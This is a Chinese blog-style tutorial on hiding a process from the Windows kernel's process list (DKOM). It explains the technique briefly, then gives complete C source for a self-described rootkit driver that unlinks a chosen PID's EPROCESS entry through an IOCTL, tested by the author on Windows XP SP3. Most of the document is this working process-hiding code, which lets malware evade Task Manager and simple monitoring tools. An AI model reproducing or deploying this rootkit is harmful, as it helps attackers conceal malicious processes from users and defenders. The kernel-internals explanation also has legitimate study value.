内核学习驱动隐藏进程

实在不好意思拿出手，都是人家玩烂的技术了。。。可我还是要学习。。。也给小白们科普了 

原理:

windows系统内核内部采用链表的方式将进程链起来。如果我们从链表中摘掉想要隐藏的进程，那么一般的采用这种方式遍历进程的工具也就没有用处了。。也就达到我们的目的了。。悲哀的任务管理器。。。具体的就不记录了。。。(但是这种方法对现在的杀毒基本不起什么作用。。除了一些弱智杀毒软件。。。)

对内核数据结构的操作需要工作在Cpu的Ring0层，一般的应用程序也就没什么用武之地了 。。只有采用驱动的方式进行。。。nb的驱动。。邪恶的驱动。。。

下面自己的写的驱动代码。。不是很稳定。。。windows xp sp3下能正常运行，其他的系统没有测试。。估计要蓝屏 因为里面有HardCode。。 蓝屏不要拍我啊 。。。

  1 
  2 #include "ntddk.h"
  3 #include "stdio.h"
  4 #include "stdlib.h"
  5 typedef BOOLEAN BOOL;
  6 typedef unsigned long DWORD;
  7 typedef DWORD * PDWORD;
  8 
  9 #define FILE_DEVICE_ROOTKIT      0x00002a7b
 10 
 11 #define IOCTL_ROOTKIT_INIT            (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 12 #define IOCTL_ROOTKIT_HIDEME          (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 13 int FLINKOFFSET;   
 14 int PIDOFFSET; 
 15 PDEVICE_OBJECT g_RootkitDevice; 
 16 const WCHAR deviceLinkBuffer[]  = L"\\DosDevices\\Fr";
 17 const WCHAR deviceNameBuffer[]  = L"\\Device\\Fr";
 18 
 19 #define   DebugPrint        DbgPrint   
 20 
 21 
 22 NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
 23 
 24 NTSTATUS RootkitHide(IN PDEVICE_OBJECT, IN PIRP);
 25 
 26 NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
 27 
 28 long    FindEproc( long pID );
 29 
 30 
 31 NTSTATUS DriverEntry(
 32                    IN PDRIVER_OBJECT  DriverObject,
 33                    IN PUNICODE_STRING RegistryPath
 34                     )
 35 {
 36     
 37     NTSTATUS                ntStatus;
 38     UNICODE_STRING          deviceNameUnicodeString;
 39     UNICODE_STRING          deviceLinkUnicodeString;        
 40     RtlInitUnicodeString (&deviceNameUnicodeString,
 41                           deviceNameBuffer );
 42     RtlInitUnicodeString (&deviceLinkUnicodeString,
 43                           deviceLinkBuffer );
 44 
 45     ntStatus = IoCreateDevice ( DriverObject,
 46                                 0, // For driver extension
 47                                 &deviceNameUnicodeString,
 48                                 FILE_DEVICE_ROOTKIT,
 49                                 0,
 50                                 TRUE,
 51                                 &g_RootkitDevice );
 52 
 53     if( NT_SUCCESS(ntStatus)) {
 54         ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
 55                                          &deviceNameUnicodeString );
 56 
 57         DriverObject->MajorFunction[IRP_MJ_SHUTDOWN]        =
 58         DriverObject->MajorFunction[IRP_MJ_CREATE]          =
 59         DriverObject->MajorFunction[IRP_MJ_CLOSE]           = RootkitDispatch;
 60         DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]  = RootkitHide;
 61 
 62         DriverObject->DriverUnload                          = RootkitUnload;
 63     }
 64     else 
 65     {
 66         DebugPrint(("Failed to create device!\n"));
 67         return ntStatus;
 68     }
 69 
 70     return STATUS_SUCCESS;
 71 }
 72 
 73 
 74 NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
 75 {
 76     UNICODE_STRING          deviceLinkUnicodeString;
 77     PDEVICE_OBJECT            p_NextObj;
 78 
 79     p_NextObj = DriverObject->DeviceObject;
 80 
 81     if (p_NextObj != NULL)
 82     {
 83         RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
 84         IoDeleteSymbolicLink( &deviceLinkUnicodeString );
 85         IoDeleteDevice( DriverObject->DeviceObject );
 86         return STATUS_SUCCESS;
 87     }
 88     return STATUS_SUCCESS;
 89 }
 90 
 91 
 92 NTSTATUS 
 93 RootkitDispatch(
 94     IN PDEVICE_OBJECT DeviceObject, 
 95     IN PIRP Irp 
 96     )
 97 {
 98     PIO_STACK_LOCATION      irpStack;
 99     PVOID                   inputBuffer;
     PVOID                   outputBuffer;
     ULONG                   inputBufferLength;
     ULONG                   outputBufferLength;
     ULONG                   ioControlCode;
     NTSTATUS                ntstatus;
     
     ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
     Irp->IoStatus.Information = 0;
     irpStack = IoGetCurrentIrpStackLocation (Irp);
     
     inputBuffer             = Irp->AssociatedIrp.SystemBuffer;
     inputBufferLength       = irpStack->Parameters.DeviceIoControl.InputBufferLength;
     outputBuffer            = Irp->AssociatedIrp.SystemBuffer;
     outputBufferLength      = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
     ioControlCode           = irpStack->Parameters.DeviceIoControl.IoControlCode;
 
     switch (irpStack->MajorFunction) {
     case IRP_MJ_CREATE:
         break;
 
     case IRP_MJ_SHUTDOWN:
         break;
 
     case IRP_MJ_CLOSE:
         break;
 
     }
     IoCompleteRequest( Irp, IO_NO_INCREMENT );
     return ntstatus;   
 }
 
 
 NTSTATUS 
 RootkitHide(
                 IN PDEVICE_OBJECT DeviceObject, 
                 IN PIRP irp 
                 )
 {
 
     NTSTATUS status = STATUS_UNSUCCESSFUL;
     
     int Hide_ID = 0;
     
     long eproc    = 0;
     
     
     PLIST_ENTRY  pList = NULL;
     
     PIO_STACK_LOCATION irpsp = IoGetCurrentIrpStackLocation( irp );
     
     long    ctrlcode = irpsp->Parameters.DeviceIoControl.IoControlCode;
     long    inlength = irpsp->Parameters.DeviceIoControl.InputBufferLength;
     long    outlength= irpsp->Parameters.DeviceIoControl.OutputBufferLength;
     
     void*    pbuffer     =  irp->AssociatedIrp.SystemBuffer;
     
     if ( ctrlcode ==  IOCTL_ROOTKIT_HIDEME)
     {
         Hide_ID = *((long*)pbuffer);
         if ( Hide_ID == 0 )
         {
             irp->IoStatus.Status = STATUS_INVALID_PARAMETER;
             irp->IoStatus.Information = 0;
         }
         else
         {
             
             eproc = FindEproc( Hide_ID );
             if ( eproc == 0)
             {
                 irp->IoStatus.Status = STATUS_INVALID_PARAMETER;
                 irp->IoStatus.Information = 0;
                 
             }
             else
             {
                 pList = (LIST_ENTRY*)(eproc + FLINKOFFSET );
                 
                 pList->Blink->Flink  = pList->Flink;
                 pList->Flink->Blink  = pList->Blink;                    
                 
                 irp->IoStatus.Status = STATUS_SUCCESS;
                 irp->IoStatus.Information = 0;
             }
             
             
         }
     }
     
     else if(ctrlcode == IOCTL_ROOTKIT_INIT )
     {
         PIDOFFSET   = *((int*)pbuffer);
         FLINKOFFSET = *((int*)pbuffer+1);
         
         irp->IoStatus.Status = STATUS_SUCCESS;
         irp->IoStatus.Information = 0;
         
     }
     else
     {    
         irp->IoStatus.Information = 0;
         irp->IoStatus.Status = STATUS_INVALID_PARAMETER;
     }
     
     
     
     IoCompleteRequest( irp, IO_NO_INCREMENT );
     
     return irp->IoStatus.Status;
 }
 
 
 
 
 long    FindEproc( long pID )
 {
     
     long eproc            = 0;
     long lcurID            = 0;        
     long lstartID        = 0;
     long lCount            = 0;
     PLIST_ENTRY p        = NULL;
     
     if ( pID == 0 )
     {
         return pID;
     }
     
     eproc = (long )PsGetCurrentProcess( );
     lcurID    = *((long*)(eproc + PIDOFFSET));
     lstartID = lcurID;
     
     p = (PLIST_ENTRY) (eproc + FLINKOFFSET ) ;
     
     
     
     while( 1 )
     {
         
         if ( lCount > 1 && lstartID == lcurID )
         {
             return 0;
         }
         
         
         p = p->Flink;
         eproc = (long) (p );
             
         eproc = eproc - FLINKOFFSET;
 
         lcurID = *((long*)(eproc + PIDOFFSET));
 
         lCount++;
         
         
         if ( lcurID == pID )
         {
             return  (long)eproc;
         }
         
     }
     
 }